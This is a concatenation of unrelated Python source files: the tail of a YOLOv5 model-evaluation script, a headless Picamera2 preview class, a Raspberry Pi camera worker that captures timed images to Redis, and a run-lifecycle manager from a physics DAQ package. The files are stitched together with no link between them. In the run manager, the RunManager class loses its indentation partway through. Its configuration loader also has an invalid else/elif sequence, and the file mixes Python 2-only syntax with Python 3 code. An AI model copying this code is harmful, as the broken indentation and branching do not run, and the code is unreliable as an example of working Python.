                eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files]  # image IDs to evaluate
            eval.evaluate()
            eval.accumulate()
            eval.summarize()
            map, map50 = eval.stats[:2]  # update results (mAP@0.5:0.95, mAP@0.5)
        except Exception as e:
            print(f'pycocotools unable to run: {e}')

    # Return results
    model.float()  # for training
    if not training:
        s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
        print(f"Results saved to {save_dir}{s}")
    maps = np.zeros(nc) + map
    for i, c in enumerate(ap_class):
        maps[c] = ap[i]
    return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
    # Command-line entry point: parse options, then dispatch on --task.
    parser = argparse.ArgumentParser(prog='test.py')
    parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
    parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
    parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
    parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
    parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
    parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
    parser.add_argument('--augment', action='store_true', help='augmented inference')
    parser.add_argument('--verbose', action='store_true', help='report mAP by class')
    parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
    parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
    parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
    parser.add_argument('--project', default='runs/test', help='save to project/name')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    opt = parser.parse_args()
    opt.save_json |= opt.data.endswith('coco.yaml')  # always save JSON when evaluating on COCO
    opt.data = check_file(opt.data)  # check file
    print(opt)
    check_requirements()

    if opt.task in ['val', 'test']:  # run normally
        test(opt.data,
             opt.weights,
             opt.batch_size,
             opt.img_size,
             opt.conf_thres,
             opt.iou_thres,
             opt.save_json,
             opt.single_cls,
             opt.augment,
             opt.verbose,
             save_txt=opt.save_txt | opt.save_hybrid,  # hybrid labelling implies txt output
             save_hybrid=opt.save_hybrid,
             save_conf=opt.save_conf,
             )

    elif opt.task == 'speed':  # speed benchmarks
        for w in opt.weights:
            test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)

    elif opt.task == 'study':  # run over a range of settings and save/plot
        # python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
        x = list(range(256, 1536 + 128, 128))  # x axis (image sizes)
        for w in opt.weights:
            f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt'  # filename to save to
            y = []  # y axis
            for i in x:  # img-size
                print(f'\nRunning {f} point {i}...')
                r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
                               plots=False)
                y.append(r + t)  # results and times
            np.savetxt(f, y, fmt='%10.4g')  # save
        os.system('zip -r study.zip study_*.txt')
        plot_study_txt(x=x)  # plot
|
null_preview.py | import picamera2.picamera2
import threading
class NullPreview:
    """Headless "preview" for Picamera2.

    Drives the camera event loop on a background thread without rendering
    anything, so it can serve as a drop-in replacement for the Qt/DRM
    preview windows when no display is needed.
    """

    def __init__(self, x=None, y=None, width=None, height=None):
        # Ignore width and height as they are meaningless. We only accept them so as to
        # be a drop-in replacement for the Qt/DRM previews.
        self.size = (width, height)
        self.event = threading.Event()
        self.picam2 = None
        # Initialise thread state up front so stop() is safe even if start()
        # was never called (the original raised AttributeError in that case).
        self.thread = None
        self.running = False

    def thread_func(self, picam2):
        """Poll the camera manager's event fd and dispatch completed requests."""
        import selectors
        sel = selectors.DefaultSelector()
        sel.register(picam2.camera_manager.efd, selectors.EVENT_READ, self.handle_request)
        self.event.set()  # tell start() the loop is up and running
        while self.running:
            events = sel.select(0.2)  # 200 ms timeout so self.running is re-checked
            for key, mask in events:
                callback = key.data
                callback(picam2)

    def start(self, picam2):
        """Begin processing events for *picam2*; blocks until the loop is running."""
        self.picam2 = picam2
        self.thread = threading.Thread(target=self.thread_func, args=(picam2,))
        self.thread.daemon = True  # setDaemon() is deprecated since Python 3.10
        self.running = True
        self.thread.start()
        self.event.wait()

    def set_overlay(self, overlay):
        # This only exists so as to have the same interface as other preview windows.
        pass

    def handle_request(self, picam2):
        """Process any completed requests and release them back to the camera."""
        completed_request = picam2.process_requests()
        if completed_request:
            completed_request.release()

    def stop(self):
        """Stop the event loop thread (no-op if it was never started)."""
        self.running = False
        if self.thread is not None:
            self.thread.join()
            self.thread = None
        self.picam2 = None
|
camera_worker.py | """
This is (for instance) a Raspberry Pi only worker!
The libcamera project (in development), aims to offer an open source stack for
cameras for Linux, ChromeOS and Android.
It will be able to detect and manage all of the exposed cameras on the system,
connected via USB or CSI (Raspberry Pi camera).
libcamera developers plan to provide Python bindings:
https://www.raspberrypi.org/blog/an-open-source-camera-stack-for-raspberry-pi-using-libcamera/#comment-1528789
Not available at time of writing: 9 Nov 2020
Once available, we should look forward migrating to this library, as it would
allow our worker to support multiple boards and devices.
"""
import datetime
import json
import os
import sys
import threading
import time
from picamera import PiCamera
from utils import get_config_item
from workers.linux.worker import Worker
from logger.Logger import Logger, LOG_LEVEL
class CameraWorker(Worker):
    """Worker that periodically captures still images with a Raspberry Pi camera.

    Each captured file path is stored in Redis (``last_camera_image``) and
    broadcast on the configured pubsub topic. The worker also listens on the
    same topic for ``Timelapse`` events, which trigger a camera reset.
    """

    def __init__(self, config, main_thread_running, system_ready,
                 camera_available):
        super().__init__(config, main_thread_running, system_ready)
        self.pending_reset = False
        # Events
        self.camera_available = camera_available
        # Dynamic Properties based on config
        self.path = get_config_item(self.config, 'path', '/etc/mudpi/img/')
        self.topic = get_config_item(
            self.config, 'topic', 'mudpi/camera/', replace_char="/"
        )
        # Use .get() so a missing 'resolution'/'delay' key behaves like an
        # explicit null instead of raising KeyError (the original crashed here
        # when the key was absent from the config).
        if self.config.get('resolution') is not None:
            self.resolutionX = int(self.config['resolution'].get('x', 1920))
            self.resolutionY = int(self.config['resolution'].get('y', 1080))
        if self.config.get('delay') is not None:
            self.hours = int(self.config['delay'].get('hours', 0))
            self.minutes = int(self.config['delay'].get('minutes', 0))
            self.seconds = int(self.config['delay'].get('seconds', 0))
        self.init()
        return

    def init(self):
        """Open the camera, lock exposure/white balance, and subscribe to events."""
        try:
            self.camera = PiCamera(
                resolution=(self.resolutionX, self.resolutionY))
            # Below we calibrate the camera for consistent imaging
            self.camera.framerate = 30
            # Wait for the automatic gain control to settle
            time.sleep(2)
            # Now fix the values
            self.camera.shutter_speed = self.camera.exposure_speed
            self.camera.exposure_mode = 'off'
            g = self.camera.awb_gains
            self.camera.awb_mode = 'off'
            self.camera.awb_gains = g
        except Exception:
            # Fall back to camera defaults (e.g. no resolution configured)
            self.camera = PiCamera()
        # Pubsub Listeners
        self.pubsub = self.r.pubsub()
        self.pubsub.subscribe(**{self.topic: self.handle_event})
        Logger.log(
            LOG_LEVEL["info"],
            'Camera Worker...\t\t\t\033[1;32m Ready\033[0;0m'
        )
        return

    def run(self):
        """Start the capture thread and the pubsub listener thread."""
        thread = threading.Thread(target=self.work, args=())
        thread.start()
        self.listener = threading.Thread(target=self.listen, args=())
        self.listener.start()
        Logger.log(
            LOG_LEVEL["info"],
            'Camera Worker...\t\t\t\033[1;32m Online\033[0;0m'
        )
        return thread

    def wait(self):
        """Sleep until the next scheduled capture time."""
        # Calculate the delay
        try:
            self.next_time = (datetime.datetime.now() + datetime.timedelta(
                hours=self.hours, minutes=self.minutes,
                seconds=self.seconds)).replace(microsecond=0)
        except Exception:
            # Default every hour (no delay configured)
            self.next_time = (
                datetime.datetime.now() + datetime.timedelta(hours=1)
            ).replace(minute=0, second=0, microsecond=0)
        delay = (self.next_time - datetime.datetime.now()).seconds
        time.sleep(delay)

    def handle_event(self, message):
        """Handle a pubsub message; a 'Timelapse' event schedules a camera reset."""
        data = message['data']
        decoded_message = None
        if data is not None:
            try:
                if isinstance(data, dict):
                    decoded_message = data
                elif isinstance(data.decode('utf-8'), str):
                    temp = json.loads(data.decode('utf-8'))
                    decoded_message = temp
                if decoded_message['event'] == 'Timelapse':
                    Logger.log(
                        LOG_LEVEL["info"],
                        "Camera Signaled for Reset"
                    )
                    self.camera_available.clear()
                    self.pending_reset = True
            except Exception:
                Logger.log(LOG_LEVEL["error"],
                           'Error Handling Event for Camera')

    def listen(self):
        """Poll pubsub while the system is up; pause polling during a reset."""
        while self.main_thread_running.is_set():
            if self.system_ready.is_set():
                if self.camera_available.is_set():
                    self.pubsub.get_message()
                    time.sleep(1)
                else:
                    delay = (
                        self.next_time - datetime.datetime.now()
                    ).seconds + 15
                    # wait 15 seconds after next scheduled picture
                    time.sleep(delay)
                    self.camera_available.set()
            else:
                time.sleep(2)
        return

    def work(self):
        """Main capture loop: take numbered photos until shutdown, then clean up."""
        self.reset_elapsed_time()
        while self.main_thread_running.is_set():
            if self.system_ready.is_set():
                if self.camera_available.is_set():
                    # try:
                    for i, filename in enumerate(
                            self.camera.capture_continuous(
                                self.path + 'mudpi-{counter:05d}.jpg')):
                        if not self.camera_available.is_set():
                            if self.pending_reset:
                                try:
                                    # cleanup previous file
                                    os.remove(
                                        filename
                                    )
                                    self.pending_reset = False
                                except Exception:
                                    Logger.log(
                                        LOG_LEVEL["error"],
                                        "Error During Camera Reset Cleanup"
                                    )
                            break
                        message = {'event': 'StateChanged', 'data': filename}
                        self.r.set('last_camera_image', filename)
                        self.r.publish(self.topic, json.dumps(message))
                        Logger.log(
                            LOG_LEVEL["debug"],
                            'Image Captured \033[1;36m%s\033[0;0m' % filename
                        )
                        self.wait()
                    # except:
                    #     print("Camera Worker \t\033[1;31m Unexpected Error\033[0;0m")
                    #     time.sleep(30)
                else:
                    time.sleep(1)
                    self.reset_elapsed_time()
            else:
                # System not ready camera should be off
                time.sleep(1)
                self.reset_elapsed_time()
            time.sleep(0.1)
        # This is only ran after the main thread is shut down
        self.camera.close()
        self.listener.join()
        self.pubsub.close()
        Logger.log(
            LOG_LEVEL["info"],
            "Camera Worker Shutting Down...\t\t\033[1;32m Complete\033[0;0m"
        )
|
run_manager.py | import logging
import datetime
import os
import re
from collections import namedtuple
from threading import Lock, Thread, Event, current_thread, _MainThread
import sys
import functools
import traceback
import signal
import abc
from contextlib import contextmanager
from importlib import import_module
from inspect import getmembers, isclass, getargspec
from functools import partial
from ast import literal_eval
from time import time
from functools import wraps
from yaml import safe_load
from pybar.utils.utils import find_file_dir_up
punctuation = '!,.:;?'
_RunStatus = namedtuple('RunStatus', ['init', 'running', 'finished', 'stopped', 'aborted', 'crashed'])
run_status = _RunStatus(init='INIT', running='RUNNING', finished='FINISHED', stopped='STOPPED', aborted='ABORTED', crashed='CRASHED')
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(name)s - [%(levelname)-8s] (%(threadName)-10s) %(message)s")
class RunAborted(Exception):
    """Signals that the current run was aborted before completion."""
class RunStopped(Exception):
    """Signals that the current run was stopped gently but intentionally."""
class RunBase(object):
    '''Basic run meta class
    Base class for run class. Subclasses implement pre_run/do_run/post_run/
    cleanup_run; run() drives the full lifecycle, records status transitions
    and maintains a run.cfg bookkeeping file in the working directory.
    '''
    __metaclass__ = abc.ABCMeta  # NOTE(review): Python 2 metaclass syntax; has no effect on Python 3

    def __init__(self, conf):
        '''Initialize object.
        Parameters
        ----------
        conf : dict
            Persistent configuration for all runs.
        '''
        self._conf = conf
        self._run_conf = None
        self._run_number = None
        self._run_status = run_status.init
        self.file_lock = Lock()  # serialises access to the run.cfg file
        self.stop_run = Event()  # abort condition for loops
        self.abort_run = Event()
        self._run_start_time = None
        self._run_stop_time = None
        self._total_run_time = None
        self._last_error_message = None
        self._last_traceback = None
        self._cancel_functions = None
        self.connect_cancel(["abort"])  # default cancel action is a hard abort

    def __getattr__(self, name):
        ''' This is called in a last attempt to receive the value for an attribute that was not found in the usual places.
        '''
        # Falls through to run-conf parameters, so run_conf keys read like attributes.
        try:
            return self._run_conf[name]  # Accessing run conf parameters
        except (KeyError, TypeError):  # If key is not existing or run conf is not a dict
            raise AttributeError("'%s' has no attribute '%s'" % (self.__class__.__name__, name))

    @property
    def run_id(self):
        '''Run name without whitespace
        '''
        # CamelCase class name -> snake_case identifier.
        s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', self.__class__.__name__)
        return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()

    @property
    def conf(self):
        '''Configuration (namedtuple)
        '''
        conf = namedtuple('conf', field_names=self._conf.keys())
        return conf(**self._conf)  # prevent changing dict

    @property
    def run_conf(self):
        '''Run configuration (namedtuple)
        '''
        run_conf = namedtuple('run_conf', field_names=self._run_conf.keys())
        return run_conf(**self._run_conf)  # prevent changing dict

    @abc.abstractproperty
    def _default_run_conf(self):
        '''Defining default run configuration (dictionary)
        '''
        pass

    @property
    def default_run_conf(self):
        '''Default run configuration (namedtuple)
        '''
        default_run_conf = namedtuple('default_run_conf', field_names=self._default_run_conf.keys())
        return default_run_conf(**self._default_run_conf)  # prevent changing dict

    @property
    def working_dir(self):
        # Directory where run.cfg, crash.log and run output live.
        return self._conf['working_dir']

    @property
    def run_number(self):
        return self._run_number

    @run_number.setter
    def run_number(self, value):
        # Read-only: the run number is assigned internally by _write_run_number().
        raise AttributeError

    @property
    def run_status(self):
        return self._run_status

    @run_status.setter
    def run_status(self, value):
        # Read-only: status transitions happen only inside run()/_init().
        raise AttributeError

    def get_run_status(self):
        # Callable variant of run_status, usable as a default_func for thunkify().
        return self._run_status

    def run(self, run_conf, run_number=None, signal_handler=None):
        '''Execute one full run lifecycle and return the final status string.'''
        self._init(run_conf, run_number)
        logging.info('Starting run %d (%s) in %s', self.run_number, self.__class__.__name__, self.working_dir)

        # set up signal handler (only possible from the main thread)
        if isinstance(current_thread(), _MainThread):
            logging.info('Press Ctrl-C to stop run')
            if not signal_handler:
                signal_handler = self._signal_handler
            signal.signal(signal.SIGINT, signal_handler)

        try:
            with self._run():
                self.do_run()
        except RunAborted as e:
            self._run_status = run_status.aborted
            self._last_traceback = None
            self._last_error_message = e.__class__.__name__ + ": " + str(e)
        except Exception as e:
            self._run_status = run_status.crashed
            self._last_traceback = traceback.format_exc()
            self._last_error_message = e.__class__.__name__ + ": " + str(e)
        else:
            self._run_status = run_status.finished
            self._last_traceback = None
            self._last_error_message = None
        finally:
            pass
        # NOTE(review): cleanup below sits after the try, not in finally, so a
        # BaseException (e.g. KeyboardInterrupt) would skip it — confirm intended.

        # revert signal handler to default
        if isinstance(current_thread(), _MainThread):
            signal.signal(signal.SIGINT, signal.SIG_DFL)
        self._cleanup()

        # log message
        if self.run_status == run_status.finished:
            log_status = logging.INFO
        else:
            if self.run_status == run_status.stopped:
                log_status = logging.INFO
            elif self.run_status == run_status.aborted:
                log_status = logging.WARNING
            else:
                log_status = logging.ERROR
        logging.log(log_status, 'Run {} {}{}{}'.format(self.run_number, self.run_status, (': ' + str(self._last_error_message)) if self._last_error_message else '', ('\n' + self._last_traceback) if self._last_traceback else ''))
        if self._last_traceback:
            # Append the crash traceback to a persistent crash.log for post-mortem.
            with open(os.path.join(self.working_dir, "crash" + ".log"), 'a+') as f:
                f.write('-------------------- Run {} ({}) --------------------\n'.format(self.run_number, self.__class__.__name__))
                traceback.print_exc(file=f)
                f.write('\n')
        logging.log(log_status, '{} run {} ({}) in {} (total time: {})'.format(self.run_status, self.run_number, self.__class__.__name__, self.working_dir, str(self._total_run_time)))
        return self.run_status

    def _init(self, run_conf, run_number=None):
        '''Initialization before a new run.
        '''
        self.stop_run.clear()
        self.abort_run.clear()
        self._run_status = run_status.running
        self._write_run_number(run_number)
        self._init_run_conf(run_conf)

    def _init_run_conf(self, run_conf):
        # Refuse run-conf keys that would shadow existing attributes/properties,
        # since __getattr__ only resolves names NOT found the usual way.
        attribute_names = [key for key in self._default_run_conf.keys() if (key in self.__dict__ or (hasattr(self.__class__, key) and isinstance(getattr(self.__class__, key), property)))]
        if attribute_names:
            raise RuntimeError('Attribute names already in use. Rename the following parameters in run conf: %s' % ', '.join(attribute_names))
        sc = namedtuple('run_configuration', field_names=self._default_run_conf.keys())
        default_run_conf = sc(**self._default_run_conf)
        if run_conf:
            self._run_conf = default_run_conf._replace(**run_conf)._asdict()
        else:
            self._run_conf = default_run_conf._asdict()

    @contextmanager
    def _run(self):
        # Wraps do_run() with pre/post hooks; cleanup_run() always executes.
        try:
            self.pre_run()
            yield
            self.post_run()
            if self.abort_run.is_set():
                raise RunAborted()
        finally:
            self.cleanup_run()

    @abc.abstractmethod
    def pre_run(self):
        '''Before run.
        '''
        pass

    @abc.abstractmethod
    def do_run(self):
        '''The run.
        '''
        pass

    @abc.abstractmethod
    def post_run(self):
        '''After run.
        '''
        pass

    @abc.abstractmethod
    def cleanup_run(self):
        '''Cleanup after run, will be executed always, even after exception. Avoid throwing exceptions here.
        '''
        pass

    def _cleanup(self):
        '''Cleanup after a new run.
        '''
        self._write_run_status(self.run_status)

    def connect_cancel(self, functions):
        '''Run given functions when a run is cancelled.
        '''
        # Accepts method names (strings) or arbitrary callables.
        self._cancel_functions = []
        for func in functions:
            if isinstance(func, basestring) and hasattr(self, func) and callable(getattr(self, func)):  # NOTE(review): basestring is Python 2 only
                self._cancel_functions.append(getattr(self, func))
            elif callable(func):
                self._cancel_functions.append(func)
            else:
                raise ValueError("Unknown function %s" % str(func))

    def handle_cancel(self, **kwargs):
        '''Cancelling a run.
        '''
        # Forward only the keyword arguments each cancel function actually accepts.
        for func in self._cancel_functions:
            f_args = getargspec(func)[0]
            f_kwargs = {key: kwargs[key] for key in f_args if key in kwargs}
            func(**f_kwargs)

    def stop(self, msg=None):
        '''Stopping a run. Control for loops. Gentle stop/abort.
        This event should provide a more gentle abort. The run should stop ASAP but the run is still considered complete.
        '''
        if not self.stop_run.is_set():
            if msg:
                logging.info('%s%s Stopping run...', msg, ('' if msg[-1] in punctuation else '.'))
            else:
                logging.info('Stopping run...')
            self.stop_run.set()

    def abort(self, msg=None):
        '''Aborting a run. Control for loops. Immediate stop/abort.
        The implementation should stop a run ASAP when this event is set. The run is considered incomplete.
        '''
        if not self.abort_run.is_set():
            if msg:
                logging.error('%s%s Aborting run...', msg, ('' if msg[-1] in punctuation else '.'))
            else:
                logging.error('Aborting run...')
            self.abort_run.set()
            self.stop_run.set()  # set stop_run in case abort_run event is not used

    def close(self):
        '''Close properly and releasing hardware resources.
        This should be called before Python garbage collector takes action.
        '''
        pass

    def _get_run_numbers(self, status=None):
        # Parse run.cfg and return {run_number: line}, optionally filtered by status.
        run_numbers = {}
        with self.file_lock:
            if not os.path.exists(self.working_dir):
                os.makedirs(self.working_dir)
            # In Python 2.x, open on all POSIX systems ultimately just depends on fopen.
            with open(os.path.join(self.working_dir, "run" + ".cfg"), 'a+') as f:
                f.seek(0)  # 'a+' positions at end; rewind before reading
                for line in f.readlines():
                    try:
                        number_parts = re.findall('\d+\s+', line)
                        parts = re.split('\s+', line)
                        if status:
                            if parts[2] in status:
                                run_number = int(number_parts[0])
                            else:
                                continue
                        else:
                            run_number = int(number_parts[0])
                    except IndexError:
                        continue  # malformed line, skip
                    if line[-1] != '\n':
                        line = line + '\n'
                    run_numbers[run_number] = line
        return run_numbers

    def _write_run_number(self, run_number=None):
        # Assign the next run number (or the given one) and record it as RUNNING.
        self._run_start_time = datetime.datetime.now()
        run_numbers = self._get_run_numbers()
        if run_number:
            self._run_number = run_number
        else:
            if not run_numbers:
                self._run_number = 1
            else:
                self._run_number = max(dict.iterkeys(run_numbers)) + 1  # NOTE(review): dict.iterkeys is Python 2 only
        run_numbers[self.run_number] = str(self.run_number) + ' ' + self.__class__.__name__ + ' ' + 'RUNNING' + ' ' + str(self._run_start_time) + '\n'
        with self.file_lock:
            with open(os.path.join(self.working_dir, "run" + ".cfg"), "w") as f:
                for value in dict.itervalues(run_numbers):
                    f.write(value)

    def _write_run_status(self, status_msg):
        # Rewrite this run's line in run.cfg with final status and timing.
        self._run_stop_time = datetime.datetime.now()
        self._total_run_time = self._run_stop_time - self._run_start_time
        run_numbers = self._get_run_numbers()
        if not run_numbers:
            run_numbers[self.run_number] = str(self.run_number) + ' ' + self.__class__.__name__ + ' ' + status_msg + ' ' + str(self._run_stop_time) + ' ' + str(self._total_run_time) + '\n'
        else:
            parts = re.split('\s+', run_numbers[self.run_number])
            parts[2] = status_msg
            run_numbers[self.run_number] = ' '.join(parts[:-1]) + ' ' + str(self._run_stop_time) + ' ' + str(self._total_run_time) + '\n'
        with self.file_lock:
            with open(os.path.join(self.working_dir, "run" + ".cfg"), "w") as f:
                for value in dict.itervalues(run_numbers):
                    f.write(value)

    def _signal_handler(self, signum, frame):
        signal.signal(signal.SIGINT, signal.SIG_DFL)  # setting default handler... pressing Ctrl-C a second time will kill application
        self.handle_cancel(msg='Pressed Ctrl-C')
def thunkify(thread_name=None, daemon=True, default_func=None):
    '''Make a function immediately return a function of no args which, when called,
    waits for the result, which will start being processed in another thread.
    Taken from https://wiki.python.org/moin/PythonDecoratorLibrary.

    Parameters
    ----------
    thread_name : str, optional
        Name for the worker thread (useful in log output).
    daemon : bool
        Whether the worker thread is a daemon thread.
    default_func : callable, optional
        Called to produce a fallback result if the worker has not finished
        within the thunk's timeout; if None, the thunk returns None instead.
    '''
    def actual_decorator(f):
        @functools.wraps(f)
        def thunked(*args, **kwargs):
            # Shared mutable state between worker thread and thunk closure.
            result = [None]
            exc = [False, None]  # has exception?, exception info
            # wait_event = threading.Event()

            def worker_func():
                # Runs f in the background; captures result or exception info.
                try:
                    func_result = f(*args, **kwargs)
                    result[0] = func_result
                except Exception:
                    exc[0] = True
                    exc[1] = sys.exc_info()
                    logging.error("%s has thrown an exception:\n%s", thread_name, traceback.format_exc())
                # finally:
                #     wait_event.set()
            worker_thread = Thread(target=worker_func, name=thread_name if thread_name else None)
            worker_thread.daemon = daemon

            def thunk(timeout=None):
                '''Block (up to timeout seconds) and return the worker's result.'''
                # avoid blocking MainThread: poll join in short slices so
                # signals (e.g. Ctrl-C) can still be delivered.
                start_time = time()
                while True:
                    worker_thread.join(timeout=0.1)
                    if (timeout and timeout < time() - start_time) or not worker_thread.is_alive():
                        break
                # worker_thread.join(timeout=timeout)
                # wait_event.wait()
                if worker_thread.is_alive():
                    # Timed out: fall back to default_func (or None).
                    if default_func is None:
                        return
                    else:
                        return default_func()
                if exc[0]:
                    # NOTE(review): Python 2 re-raise syntax (preserves traceback);
                    # this line is a SyntaxError on Python 3.
                    raise exc[1][0], exc[1][1], exc[1][2]
                return result[0]
            worker_thread.start()
            # threading.Thread(target=worker_func, name=thread_name if thread_name else None).start()
            return thunk
        return thunked
    return actual_decorator
class RunManager(object):
def __init__(self, conf):
'''Run Manager is taking care of initialization and execution of runs.
Parameters
----------
conf : str, dict, file
Configuration for the run(s). Configuration will be passed to all scans.
'''
# fixing event handler: http://stackoverflow.com/questions/15457786/ctrl-c-crashes-python-after-importing-scipy-stats
if os.name == 'nt':
import thread
def handler(signum, hook=thread.interrupt_main):
hook()
return True
import win32api
win32api.SetConsoleCtrlHandler(handler, 1)
self._conf = None # configuration dictionary
self.current_run = None # current run number
self._conf_path = None # absolute path of the configuation file
self.init(conf)
@property
def conf(self):
'''Configuration (namedtuple)
'''
conf = namedtuple('conf', field_names=self._conf.keys())
return conf(**self._conf) # prevent changing dict
def init(self, conf):
# current working directory
if isinstance(conf, basestring) and os.path.isfile(os.path.abspath(conf)):
conf = os.path.abspath(conf)
self._conf_path = conf
# search directory upwards form current working directory
elif isinstance(conf, basestring) and find_file_dir_up(conf):
conf = find_file_dir_up(conf)
self._conf_path = conf
elif isinstance(conf, file):
self._conf_path = os.path.abspath(conf.name)
else:
self._conf_path = None
self._conf = self.open_conf(conf)
if 'working_dir' in self._conf and self._conf['working_dir']:
# dirty fix for Windows pathes
self._conf['working_dir'] = os.path.normpath(self._conf['working_dir'].replace('\\', '/'))
if self._conf_path and not os.path.isabs(self._conf['working_dir']):
# if working_dir is relative path, join path to configuration file and working_dir
self._conf['working_dir'] = os.path.join(os.path.dirname(self._conf_path), self._conf['working_dir'])
else:
# working_dir is absolute path, keep that
pass
# use path of configuration file
elif self._conf_path:
self._conf['working_dir'] = os.path.dirname(self._conf_path)
else:
raise ValueError('Cannot deduce working directory from configuration')
logging.info('Using working directory %s', self._conf['working_dir'])
def close(self):
if self.current_run is not None:
self.current_run.close()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
@staticmethod
def open_conf(conf):
conf_dict = {}
if not conf:
pass
elif isinstance(conf, basestring): # parse the first YAML document in a stream
if os.path.isfile(os.path.abspath(conf)):
logging.info('Loading configuration from file %s', os.path.abspath(conf))
with open(os.path.abspath(conf), 'r') as f:
conf_dict.update(safe_load(f))
else: # YAML string
try:
conf_dict.update(safe_load(conf))
except ValueError: # invalid path/filename
raise IOError("File not found: %s" % os.path.abspath(conf))
else:
logging.info('Loading configuration from file %s', os.path.abspath(conf.name))
elif isinstance(conf, file): # parse the first YAML document in a stream
conf_dict.update(safe_load(conf))
else: # conf is already a dict
conf_dict.update(conf)
return conf_dict
def cancel_current_run(self, msg=None):
    """Request cancellation of the run that is currently executing.

    Parameters
    ----------
    msg : str, optional
        Reason forwarded to the run's cancel handler.
    """
    self.current_run.handle_cancel(msg=msg)
def run_run(self, run, conf=None, run_conf=None, use_thread=False, catch_exception=True):
    '''Runs a run in another thread. Non-blocking.

    Parameters
    ----------
    run : class, object
        Run class or object.
    run_conf : str, dict, file
        Specific configuration for the run.
    use_thread : bool
        If True, run run in thread and returns blocking function.

    Returns
    -------
    If use_thread is True, returns function, which blocks until thread terminates, and which itself returns run status.
    If use_thread is False, returns run status.
    '''
    # Merge any per-call configuration into the manager's configuration.
    if isinstance(conf, basestring) and os.path.isfile(conf):
        logging.info('Updating configuration from file %s', os.path.abspath(conf))
    elif conf is not None:
        logging.info('Updating configuration')
    conf = self.open_conf(conf)
    self._conf.update(conf)
    if isclass(run):
        # instantiate the class
        run = run(conf=self._conf)
    # Build the run's effective configuration in increasing priority order:
    # global 'run_conf' key < class-name key < explicit run_conf argument.
    local_run_conf = {}
    # general parameters from conf
    if 'run_conf' in self._conf:
        logging.info('Updating run configuration using run_conf key from configuration')
        local_run_conf.update(self._conf['run_conf'])
    # check for class name, scan specific parameters from conf
    if run.__class__.__name__ in self._conf:
        logging.info('Updating run configuration using %s key from configuration' % (run.__class__.__name__,))
        local_run_conf.update(self._conf[run.__class__.__name__])
    if isinstance(run_conf, basestring) and os.path.isfile(run_conf):
        logging.info('Updating run configuration from file %s', os.path.abspath(run_conf))
    elif run_conf is not None:
        logging.info('Updating run configuration')
    run_conf = self.open_conf(run_conf)
    # check for class name, scan specific parameters from conf
    if run.__class__.__name__ in run_conf:
        run_conf = run_conf[run.__class__.__name__]
    # run_conf parameter has highest priority, updated last
    local_run_conf.update(run_conf)
    if use_thread:
        self.current_run = run

        # Wrap the run in a daemon thread; the returned callable blocks
        # until the thread finishes and then yields the run status.
        @thunkify(thread_name='RunThread', daemon=True, default_func=self.current_run.get_run_status)
        def run_run_in_thread():
            return run.run(run_conf=local_run_conf)

        # Install the Ctrl-C handler so the user can cancel the run.
        signal.signal(signal.SIGINT, self._signal_handler)
        logging.info('Press Ctrl-C to stop run')
        return run_run_in_thread()
    else:
        self.current_run = run
        status = run.run(run_conf=local_run_conf)
        if not catch_exception and status != run_status.finished:
            raise RuntimeError('Exception occurred. Please read the log.')
        return status
def run_primlist(self, primlist, skip_remaining=False):
    '''Runs runs from a primlist.

    Parameters
    ----------
    primlist : string
        Filename of primlist.
    skip_remaining : bool
        If True, skip remaining runs, if a run does not exit with status FINISHED.

    Note
    ----
    Primlist is a text file of the following format (comment line by adding '#'):
    <module name (containing class) or class (in either case use dot notation)>; <scan parameter>=<value>; <another scan parameter>=<another value>
    '''
    runlist = self.open_primlist(primlist)
    for index, run in enumerate(runlist):
        logging.info('Progressing with run %i out of %i...', index + 1, len(runlist))
        # Runs execute in a thread (keeps Ctrl-C responsive); join() blocks
        # until the run completes and returns its final status.
        join = self.run_run(run, use_thread=True)
        status = join()
        if skip_remaining and not status == run_status.finished:
            logging.error('Exited run %i with status %s: Skipping all remaining runs.', run.run_number, status)
            break
def open_primlist(self, primlist):
    """Parse a primlist file into a list of instantiated run objects.

    Parameters
    ----------
    primlist : string
        Filename of the primlist (one run per line, '#' starts a comment).

    Returns
    -------
    list
        Instantiated run objects, one per non-empty line.

    Raises
    ------
    ValueError
        If a line does not resolve to exactly one matching run class.
    AttributeError
        If *primlist* is not a string.
    """
    def isrun(item, module):
        return isinstance(item, RunBase.__metaclass__) and item.__module__ == module  # only class from module, not from other imports

    if isinstance(primlist, basestring):
        with open(primlist, 'r') as f:
            f.seek(0)
            run_list = []
            for line in f.readlines():
                # Strip trailing comments and whitespace; skip blank lines.
                line = line.partition('#')[0].strip()
                if not line:
                    continue
                parts = re.split(r'\s*[;]\s*', line)  # raw string: avoid invalid-escape warnings
                try:
                    mod = import_module(parts[0])  # points to module
                except ImportError:
                    mod = import_module(parts[0].rsplit('.', 1)[0])  # points to class
                    islocalrun = partial(isrun, module=parts[0].split('.')[-2])
